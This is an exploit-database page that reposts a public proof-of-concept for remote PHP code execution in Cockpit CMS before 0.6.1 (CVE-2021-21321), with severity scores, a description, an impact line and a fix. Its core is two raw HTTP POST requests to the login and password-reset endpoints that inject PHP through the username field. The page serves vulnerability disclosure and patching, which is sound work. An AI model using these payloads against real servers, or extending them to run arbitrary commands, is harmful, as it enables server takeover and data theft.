Advertisement






Cockpit CMS Remote Code Execution

CVE Category Price Severity
CVE-2021-21321 CWE-94 $1000 Critical
Author Risk Exploitation Type Date
Unknown Critical Remote 2021-01-09
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 0.246 0.55569

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010085

Below is a copy:

Cockpit CMS Remote Code Execution
# Cockpit CMS 0.6.1 - Remote Code Execution
# Product: Cockpit CMS (https://getcockpit.com)
# Version: Cockpit CMS < 0.6.1
# Vulnerability Type: PHP Code Execution
# Exploit Author: Rafael Resende
# Attack Type: Remote
# Vulnerability Description
# Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.

# Exploit Login
  POST /auth/check HTTP/1.1
  Host: example.com
  User-Agent: Mozilla/5.0
  Content-Type: application/json; charset=UTF-8
  Content-Length: 52
  Origin: https://example.com

  {"auth":{"user":"test'.phpinfo().'","password":"b"}}

# Exploit Password reset
  POST /auth/requestreset HTTP/1.1
  Host: example.com
  User-Agent: Mozilla/5.0
  Content-Type: application/json; charset=UTF-8
  Content-Length: 28
  Origin: https://example.com

  {"user":"test'.phpinfo().'"}

## Impact
Allows attackers to execute malicious codes to get access to the server.

## Fix
Update to versions >= 0.6.1

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum